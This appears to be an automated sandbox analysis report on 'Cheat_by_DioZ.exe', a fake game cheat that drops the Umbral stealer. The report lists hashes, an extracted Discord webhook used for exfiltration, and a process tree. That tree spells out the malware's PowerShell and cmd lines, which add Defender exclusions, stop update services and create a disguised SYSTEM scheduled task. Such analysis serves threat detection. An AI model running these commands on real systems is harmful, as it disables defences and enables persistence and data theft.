Analysis
-
max time kernel
99s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
21-08-2023 15:30
Static task
static1
Behavioral task
behavioral1
Sample
Cheat_by_DioZ.exe
Resource
win7-20230712-en
General
-
Target
Cheat_by_DioZ.exe
-
Size
15.3MB
-
MD5
7e8d421582aacc3651a5f8ae391e4605
-
SHA1
0cff4ece5e75a5dc0c5e6076ad782ecf42ad7c16
-
SHA256
a85235b38f90be244eb57d131951ff69a562714221d640ab9da0480af4aed06c
-
SHA512
7eb24ed0bddb9a681c231c92c50b52015b09466262dbdf1c1e47219f4fe76cff9adf65860d2c03cf61e8d4e7aa7ee46a7a81464773c56a81fee4a2ebec8192f1
-
SSDEEP
196608:0KMurhe046YIw782LRg5lA7B+juGhgdKDW/vDhoOocQ4cfVqwc7Mzg:0hurhf4Qm8MR8gwRh+n/lvoPDc70
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1143115606330200074/pyKgc8H0hMiolN7TnRv_a5UZxMEV9hMyMPcyMEE79xLCjkKRbFA2ce8qYJuxmfb_M-83
Signatures
-
Detect Umbral payload 5 IoCs
resource yara_rule behavioral1/memory/2180-53-0x0000000000400000-0x000000000135C000-memory.dmp family_umbral behavioral1/files/0x000e00000001231a-59.dat family_umbral behavioral1/files/0x000e00000001231a-58.dat family_umbral behavioral1/files/0x000e00000001231a-56.dat family_umbral behavioral1/memory/2568-67-0x0000000000040000-0x0000000000080000-memory.dmp family_umbral -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 924 created 1320 924 MS.exe 14 PID 924 created 1320 924 MS.exe 14 PID 924 created 1320 924 MS.exe 14 PID 924 created 1320 924 MS.exe 14 PID 924 created 1320 924 MS.exe 14 PID 924 created 1320 924 MS.exe 14 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts MS.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 2 IoCs
pid Process 2568 3S.exe 924 MS.exe -
Loads dropped DLL 2 IoCs
pid Process 2180 Cheat_by_DioZ.exe 2180 Cheat_by_DioZ.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 924 set thread context of 772 924 MS.exe 46 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe MS.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2300 sc.exe 2340 sc.exe 2724 sc.exe 2760 sc.exe 2784 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2088 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 924 MS.exe 924 MS.exe 2980 powershell.exe 924 MS.exe 924 MS.exe 924 MS.exe 924 MS.exe 924 MS.exe 924 MS.exe 924 MS.exe 924 MS.exe 772 dialer.exe 772 dialer.exe 772 dialer.exe 772 dialer.exe 2688 powershell.exe 924 MS.exe 924 MS.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 2568 3S.exe Token: SeIncreaseQuotaPrivilege 2848 wmic.exe Token: SeSecurityPrivilege 2848 wmic.exe Token: SeTakeOwnershipPrivilege 2848 wmic.exe Token: SeLoadDriverPrivilege 2848 wmic.exe Token: SeSystemProfilePrivilege 2848 wmic.exe Token: SeSystemtimePrivilege 2848 wmic.exe Token: SeProfSingleProcessPrivilege 2848 wmic.exe Token: SeIncBasePriorityPrivilege 2848 wmic.exe Token: SeCreatePagefilePrivilege 2848 wmic.exe Token: SeBackupPrivilege 2848 wmic.exe Token: SeRestorePrivilege 2848 wmic.exe Token: SeShutdownPrivilege 2848 wmic.exe Token: SeDebugPrivilege 2848 wmic.exe Token: SeSystemEnvironmentPrivilege 2848 wmic.exe Token: SeRemoteShutdownPrivilege 2848 wmic.exe Token: SeUndockPrivilege 2848 wmic.exe Token: SeManageVolumePrivilege 2848 wmic.exe Token: 33 2848 wmic.exe Token: 34 2848 wmic.exe Token: 35 2848 wmic.exe Token: SeIncreaseQuotaPrivilege 2848 wmic.exe Token: SeSecurityPrivilege 2848 wmic.exe Token: SeTakeOwnershipPrivilege 2848 wmic.exe Token: SeLoadDriverPrivilege 2848 wmic.exe Token: SeSystemProfilePrivilege 2848 wmic.exe Token: SeSystemtimePrivilege 2848 wmic.exe Token: SeProfSingleProcessPrivilege 2848 wmic.exe Token: SeIncBasePriorityPrivilege 2848 wmic.exe Token: SeCreatePagefilePrivilege 2848 wmic.exe Token: SeBackupPrivilege 2848 wmic.exe Token: SeRestorePrivilege 2848 wmic.exe Token: SeShutdownPrivilege 2848 wmic.exe Token: SeDebugPrivilege 2848 wmic.exe Token: SeSystemEnvironmentPrivilege 2848 wmic.exe Token: SeRemoteShutdownPrivilege 2848 wmic.exe Token: SeUndockPrivilege 2848 wmic.exe Token: SeManageVolumePrivilege 2848 wmic.exe Token: 33 2848 wmic.exe Token: 34 2848 wmic.exe Token: 35 2848 wmic.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeShutdownPrivilege 3016 powercfg.exe Token: SeDebugPrivilege 772 dialer.exe Token: SeShutdownPrivilege 1924 powercfg.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeShutdownPrivilege 2488 powercfg.exe Token: SeShutdownPrivilege 1588 powercfg.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2568 2180 Cheat_by_DioZ.exe 28 PID 2180 wrote to memory of 2568 2180 Cheat_by_DioZ.exe 28 PID 2180 wrote to memory of 2568 2180 Cheat_by_DioZ.exe 28 PID 2180 wrote to memory of 2568 2180 Cheat_by_DioZ.exe 28 PID 2180 wrote to memory of 924 2180 Cheat_by_DioZ.exe 29 PID 2180 wrote to memory of 924 2180 Cheat_by_DioZ.exe 29 PID 2180 wrote to memory of 924 2180 Cheat_by_DioZ.exe 29 PID 2180 wrote to memory of 924 2180 Cheat_by_DioZ.exe 29 PID 2568 wrote to memory of 2848 2568 3S.exe 32 PID 2568 wrote to memory of 2848 2568 3S.exe 32 PID 2568 wrote to memory of 2848 2568 3S.exe 32 PID 2908 wrote to memory of 2724 2908 cmd.exe 39 PID 2908 wrote to memory of 2724 2908 cmd.exe 39 PID 2908 wrote to memory of 2724 2908 cmd.exe 39 PID 2908 wrote to memory of 2760 2908 cmd.exe 40 PID 2908 wrote to memory of 2760 2908 cmd.exe 40 PID 2908 wrote to memory of 2760 2908 cmd.exe 40 PID 2908 wrote to memory of 2784 2908 cmd.exe 41 PID 2908 wrote to memory of 2784 2908 cmd.exe 41 PID 2908 wrote to memory of 2784 2908 cmd.exe 41 PID 2908 wrote to memory of 2340 2908 cmd.exe 43 PID 2908 wrote to memory of 2340 2908 cmd.exe 43 PID 2908 wrote to memory of 2340 2908 cmd.exe 43 PID 2908 wrote to memory of 2300 2908 cmd.exe 42 PID 2908 wrote to memory of 2300 2908 cmd.exe 42 PID 2908 wrote to memory of 2300 2908 cmd.exe 42 PID 924 wrote to memory of 772 924 MS.exe 46 PID 2380 wrote to memory of 3016 2380 cmd.exe 49 PID 2380 wrote to memory of 3016 2380 cmd.exe 49 PID 2380 wrote to memory of 3016 2380 cmd.exe 49 PID 2380 wrote to memory of 1924 2380 cmd.exe 50 PID 2380 wrote to memory of 1924 2380 cmd.exe 50 PID 2380 wrote to memory of 1924 2380 cmd.exe 50 PID 772 wrote to memory of 420 772 dialer.exe 1 PID 772 wrote to memory of 464 772 dialer.exe 6 PID 2380 wrote to memory of 2488 2380 cmd.exe 52 PID 2380 wrote to memory of 2488 2380 cmd.exe 52 PID 2380 wrote to memory of 2488 2380 cmd.exe 52 PID 2688 wrote to memory of 2088 2688 powershell.exe 51 PID 2688 wrote to memory of 2088 2688 powershell.exe 51 PID 2688 wrote to memory of 2088 2688 powershell.exe 51 PID 2380 wrote to memory of 1588 2380 cmd.exe 53 PID 2380 wrote to memory of 1588 2380 cmd.exe 53 PID 2380 wrote to memory of 1588 2380 cmd.exe 53 PID 772 wrote to memory of 484 772 dialer.exe 7 PID 772 wrote to memory of 492 772 dialer.exe 8 PID 772 wrote to memory of 580 772 dialer.exe 23 PID 772 wrote to memory of 660 772 dialer.exe 21 PID 772 wrote to memory of 748 772 dialer.exe 9 PID 772 wrote to memory of 800 772 dialer.exe 20 PID 772 wrote to memory of 828 772 dialer.exe 18
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:464
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:748
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:828
-
C:\Windows\system32\taskeng.exetaskeng.exe {427F9501-5228-4DE1-AF00-4FDB98605A6B} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:1712
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:800
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:660
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:580
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1320
-
C:\Users\Admin\AppData\Local\Temp\Cheat_by_DioZ.exe"C:\Users\Admin\AppData\Local\Temp\Cheat_by_DioZ.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\AppData\Local\Temp\3S.exe"C:\Users\Admin\AppData\Local\Temp\3S.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
-
C:\Users\Admin\AppData\Local\Temp\MS.exe"C:\Users\Admin\AppData\Local\Temp\MS.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:924
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2724
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2300
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2340
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cnxaozlt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2088
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1620
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
227KB
MD50c6f57e34c60e926869925974c0ba0c6
SHA1c2c96e1a4da5fe008796801569ebdfcde4d3c07b
SHA2563818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71
SHA51270281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193
-
Filesize
227KB
MD50c6f57e34c60e926869925974c0ba0c6
SHA1c2c96e1a4da5fe008796801569ebdfcde4d3c07b
SHA2563818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71
SHA51270281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193
-
Filesize
9.9MB
MD5ed1da88dca5699f9e01a7e4fa08be78c
SHA11cc67cbe8cf95217bd7f22a1e30702bf9d45e806
SHA2569773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413
SHA5124e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef
-
Filesize
9.9MB
MD5ed1da88dca5699f9e01a7e4fa08be78c
SHA11cc67cbe8cf95217bd7f22a1e30702bf9d45e806
SHA2569773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413
SHA5124e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b9d5224abe8346c9a668967ca3a118cb
SHA17f657affeade1e5b265be77a2bf8d3012a66e064
SHA2567a0c7105220386196d38673a860c5c876f5298530fde95b24d2e88d549eb33e0
SHA512e25c4a8e2efcbeb2521e0921c598028b6522d109c39e7f8bb1afd6626b194dc48ad0220e7c957408ea14178b79ed0d81dc7809a257cd803eb7f10ab732abce79
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F6A570RIF6SFSS4MM1C9.temp
Filesize7KB
MD5b9d5224abe8346c9a668967ca3a118cb
SHA17f657affeade1e5b265be77a2bf8d3012a66e064
SHA2567a0c7105220386196d38673a860c5c876f5298530fde95b24d2e88d549eb33e0
SHA512e25c4a8e2efcbeb2521e0921c598028b6522d109c39e7f8bb1afd6626b194dc48ad0220e7c957408ea14178b79ed0d81dc7809a257cd803eb7f10ab732abce79
-
Filesize
227KB
MD50c6f57e34c60e926869925974c0ba0c6
SHA1c2c96e1a4da5fe008796801569ebdfcde4d3c07b
SHA2563818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71
SHA51270281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193
-
Filesize
9.9MB
MD5ed1da88dca5699f9e01a7e4fa08be78c
SHA11cc67cbe8cf95217bd7f22a1e30702bf9d45e806
SHA2569773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413
SHA5124e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef